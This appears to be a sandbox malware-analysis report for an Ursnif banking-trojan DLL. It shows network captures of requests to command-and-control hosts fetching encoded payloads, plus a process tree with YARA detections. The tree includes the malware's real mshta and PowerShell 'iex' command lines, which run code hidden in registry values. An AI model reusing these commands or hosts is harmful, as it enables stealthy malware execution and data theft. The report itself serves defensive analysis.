                                                                                                                                      5192.168.2.34975447.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:10.932638884 CET4541OUTGET /api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2BId1l8xoRD/ZIKmgZ4Hr1ogBm_2Ft/cJTdN_2F0/sOkKUhNEij9EeyBjgxaS/fAWTeONzVOzjyGfrZxL/sesogOMoxfuQAI6mdY73Xa/BaJEnujvmw_2B/vRpLGOj_/2Bvahak4rScm4JpMfQfaO8m/3X9wT7Vyfk/qviTv3J0IbAJn2nUb/wbGIEFwb6Ch2/LDOx1illPXc/Hz_2BbvAx_2Fcr/j_0A_0DiinRm69PA4aJZ4/DJR7fgT5XYyNTfe4/_2FOY_2B_2/BAPo2cJ8YkUi/c HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:20:11.915036917 CET4542INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:11 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 37 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 15 93 45 b6 a4 50 00 43 17 c4 00 7d c8 10 77 77 66 b8 17 52 50 c8 ea fb f7 02 72 92 93 e4 0a 9f a5 f0 f9 03 cd 4b d3 90 be ac 60 e5 4f 17 64 55 6e 37 ea 19 51 a8 e5 e9 99 a2 c4 1f 56 1e 16 4e 3d 7b e0 ca 80 4a f5 47 b7 22 fb 31 a0 37 ba 9e 3d 3a 53 a0 15 63 50 ea 8b 52 79 3f 98 a9 9d 78 5c ef 52 d3 d3 ac bd 4b 09 d9 af a3 59 bd 52 a0 56 b9 f4 ea d9 19 b0 72 ab 29 66 97 af 34 55 cd 83 fd e5 69 48 11 50 f4 61 02 fa d5 c8 99 ca 08 0e 97 e2 5b 76 a8 53 57 0d b1 d1 10 ea 2b 33 1a ad 6b d8 a4 38 6d 66 c3 d7 5b fb f0 5b 3b 9e 9a ee 7c 00 3f 8c d1 ca 03 f6 e3 62 0d 97 c3 ef c4 28 2c 4d e6 7d c2 91 fa 59 d4 ce f4 bb a2 20 b1 bb 01 48 c7 e3 2c a0 50 bd 6a 86 2c cf ab 91 a9 43 b8 ec d4 95 75 0f c5 f7 47 92 dd 18 e3 a4 18 4d 17 09 f0 42 24 79 35 ae 51 d6 ad 17 59 61 ee f4 d0 22 de 12 46 d0 a0 43 97 e9 a9 59 fb 96 fa 55 e2 fb a8 fc 34 d9 c8 b6 9f 55 82 8e 64 27 6d 0a 0a 6c 28 b6 56 9b c3 06 41 ce 5f a6 dd 37 eb 47 81 04 a1 d5 2c fa 90 8a 87 7e a0 e5 c3 58 99 19 ee 9c ae bd f7 6b 38 da 5d 00 61 25 16 cb ed 12 22 79 51 ce 76 1b 9b 45 dc e5 17 0e cd db 1a 99 5f 35 02 cf f4 7c 14 7a 27 be 48 0f ce 4e 76 f1 9b 96 f1 83 91 aa ad 04 6a ae 2b b4 e6 3d f2 49 86 cf 7d 4f 63 30 d6 52 41 22 99 8b b8 42 44 05 20 58 ca 96 d2 ec d9 e7 99 11 81 64 e9 cc 39 2c da 10 f8 cb 79 98 ee 23 d4 07 fc 0d 70 c3 5b f7 eb 7f 70 25 68 ac e9 c2 3a 7f d3 e7 80 bc bd 46 b8 0a f1 da fe 81 ab 12 31 55 82 be 3e a2 fa 68 6b 76 81 3e 5c a7 d2 ee b6 11 c6 90 16 99 ca 6c 84 f3 84 b9 22 2a 9c d0 ba 13 6f f5 4b e7 de da da b1 56 88 31 60 3f f9 f6 45 7f 27 27 2c 11 88 b2 ae e8 2f 78 d3 66 26 c9 be 26 25 89 96 93 a9 5e 4f 18 84 05 e3 f0 96 dd 85 2b cb ae d7 f1 96 17 0c 27 c3 80 ca 1e 59 45 2d 0d ae f2 23 3a 4b 0e ba cd 14 3b 8f ba 83 d4 b3 2f 58 2b 8e 4f a5 92 1f c7 f8 e4 a8 79 c5 23 b8 5c 5b 02 91 d4 d3 59 d9 64 ea 26 9c 85 d2 b1 ed 9d 65 0f f2 15 d6 bc dd 18 25 cc 71 0c 25 cf 45 b3 a5 8f c4 3a 05 33 6e 03 d1 65 68 ff ae cc e6 87 ec 3d 31 08 03 fc ca 98 08 e5 1f 33 07 24 1d 37 51 98 b6 50 b9 10 a9 84 1f bb 95 52 10 3e ea 7a 13 c8 7e d2 1f 71 35 2f d4 62 2a 8f 1e 45 8b 9e b2 ca 66 b9 2a af 2d e9 51 e5 2b 49 6d 22 19 b3 ec 36 1e be be 78 1e 84 c0 4d 55 1f ab 44 aa cf 24 2e d9 f2 a4 cc cc 53 0b 1f 5c 45 ec 85 c9 6b 50 af 6a 3d 77 11 e3 8b f6 99 dc 0a 28 b2 11 ed 34 84 98 84 f4 11 23 df a6 90 f1 a8 62 c4 96 44 aa 26 0a 29 0a ae 21 3c d3 14 63 11 ca 8d 76 9b 21 05 29 66 e1 65 71 01 77 a2 b3 9f 41 ba 0c cd c2 c9 df 0f b2 50 99 44 07 2a 85 52 d8 a2 3f fc 19 3f 94 a7 45 77 0e d1 39 33 80 d1 8b ab 31 8b 48 43 a0 ad 72 7c 01 e8 11 7f 62 71 9c a5 e5 d5 93 83 be 50 ec 0c b3 64 ba 9d 90 72 82 e9 35 2b 74 d1 01 7c a1 87 6c f1 ba 8b 13 b3 78 82 8f 84 3e 22 b7 5c 0b 12 7a 7b aa 73 1c e9 cc a3 33 d3 ff 31 90 74 e2 83 cc 99 8e e8 3b 4a 6d c2 bc 31 fb 5d 19 54 d0 fa 23 6c b3 b7 b3 a8 de 86 e1 4b 23 b5 a2 c6 db 12 ec 77 fd 0f 5d 5d e7 62 0d 70 4e 37 df b3 4f 61 6d 36 10 e1 0d c6 c5 27 8e 10 4c 06 52 f1 99 a8 a0 eb 3b c2 36 ea 7e 99 79 b6 4e 1d d6 d1 cd e7 91 d6 51 ee 4e 2b 1b 30 8d b9 16 dc 4a e1 04 0f 78 28 e0 5e 3e 48 16 26 9b 8f c9 68 9a 59 af b8 88 5f ee 63 cc 8b 99 bc c3 6e 44
                                                                                                                                      Data Ascii: 73bEPC}wwfRPrK`OdUn7QVN={JG"17=:ScPRy?x\RKYRVr)f4UiHPa[vSW+3k8mf[[;|?b(,M}Y H,Pj,CuGMB$y5QYa"FCYU4Ud'ml(VA_7G,~Xk8]a%"yQvE_5|z'HNvj+=I}Oc0RA"BD Xd9,y#p[p%h:F1U>hkv>\l"*oKV1`?E'',/xf&&%^O+'YE-#:K;/X+Oy#\[Yd&e%q%E:3neh=13$7QPR>z~q5/b*Ef*-Q+Im"6xMUD$.S\EkPj=w(4#bD&)!<cv!)feqwAPD*R??Ew931HCr|bqPdr5+t|lx>"\z{s31t;Jm1]T#lK#w]]bpN7Oam6'LR;6~yNQN+0Jx(^>H&hY_cnD


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      6192.168.2.34975847.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:47.541162014 CET4561OUTGET /jvassets/xI/t64.dat HTTP/1.1
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Host: c56.lepini.at
                                                                                                                                      Nov 24, 2020 21:20:48.222243071 CET4570INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:47 GMT
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Content-Length: 138820
                                                                                                                                      Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
                                                                                                                                      Connection: close
                                                                                                                                      ETag: "5db6b84e-21e44"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1
                                                                                                                                      Data Ascii: E~r[f1pwC|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E*_v[R{MMpq9.8G^j\<*A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2|;GHf.?I63L@+Y*sX'1mcp{_gTyB!n#TCJw.m!@4db|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaX*Sw^BN*g'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_*Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI


                                                                                                                                      Code Manipulations

                                                                                                                                      Statistics

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Start time:21:18:59
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\onerous.tar.dll'
                                                                                                                                      Imagebase:0xba0000
                                                                                                                                      File size:119808 bytes
                                                                                                                                      MD5 hash:76E2251D0E9772B9DA90208AD741A205
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Start time:21:19:13
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                      Imagebase:0x7ff66ff30000
                                                                                                                                      File size:823560 bytes
                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:19:14
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2
                                                                                                                                      Imagebase:0x1210000
                                                                                                                                      File size:822536 bytes
                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:19:59
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                      Imagebase:0x7ff66ff30000
                                                                                                                                      File size:823560 bytes
                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:19:59
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2
                                                                                                                                      Imagebase:0x1210000
                                                                                                                                      File size:822536 bytes
                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:20:04
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2
                                                                                                                                      Imagebase:0x1210000
                                                                                                                                      File size:822536 bytes
                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:20:16
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\mshta.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
                                                                                                                                      Imagebase:0x7ff6232d0000
                                                                                                                                      File size:14848 bytes
                                                                                                                                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:21:20:17
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
                                                                                                                                      Imagebase:0x7ff785e30000
                                                                                                                                      File size:447488 bytes
                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:20:18
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6b2800000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:20:24
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
                                                                                                                                      Imagebase:0x7ff7fbaa0000
                                                                                                                                      File size:2739304 bytes
                                                                                                                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:21:20:25
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
                                                                                                                                      Imagebase:0x7ff617aa0000
                                                                                                                                      File size:47280 bytes
                                                                                                                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:21:20:27
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
                                                                                                                                      Imagebase:0x7ff7fbaa0000
                                                                                                                                      File size:2739304 bytes
                                                                                                                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:21:20:28
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
                                                                                                                                      Imagebase:0x7ff617aa0000
                                                                                                                                      File size:47280 bytes
                                                                                                                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:21:20:32
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:
                                                                                                                                      Imagebase:0x7ff714890000
                                                                                                                                      File size:3933184 bytes
                                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:20:37
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\control.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\control.exe -h
                                                                                                                                      Imagebase:0x7ff657870000
                                                                                                                                      File size:117760 bytes
                                                                                                                                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                      General

                                                                                                                                      Start time:21:20:44
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:
                                                                                                                                      Imagebase:0x7ff6883e0000
                                                                                                                                      File size:99272 bytes
                                                                                                                                      MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      Disassembly

                                                                                                                                      Code Analysis

                                                                                                                                      Reset < >